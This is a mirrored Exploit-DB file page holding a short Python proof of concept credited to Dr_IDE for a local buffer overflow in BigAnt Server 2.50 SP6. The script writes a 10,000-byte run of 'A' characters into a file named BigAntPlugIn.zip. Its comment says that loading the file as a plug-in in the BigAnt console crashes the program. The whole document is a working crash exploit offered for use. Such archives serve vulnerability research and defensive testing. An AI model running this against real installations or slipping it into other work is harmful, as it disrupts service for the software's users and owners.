exploit-db-mirror/exploits/windows/dos/9734.py
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

18 lines
No EOL
475 B
Python
Executable file

#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()
# milw0rm.com [2009-09-21]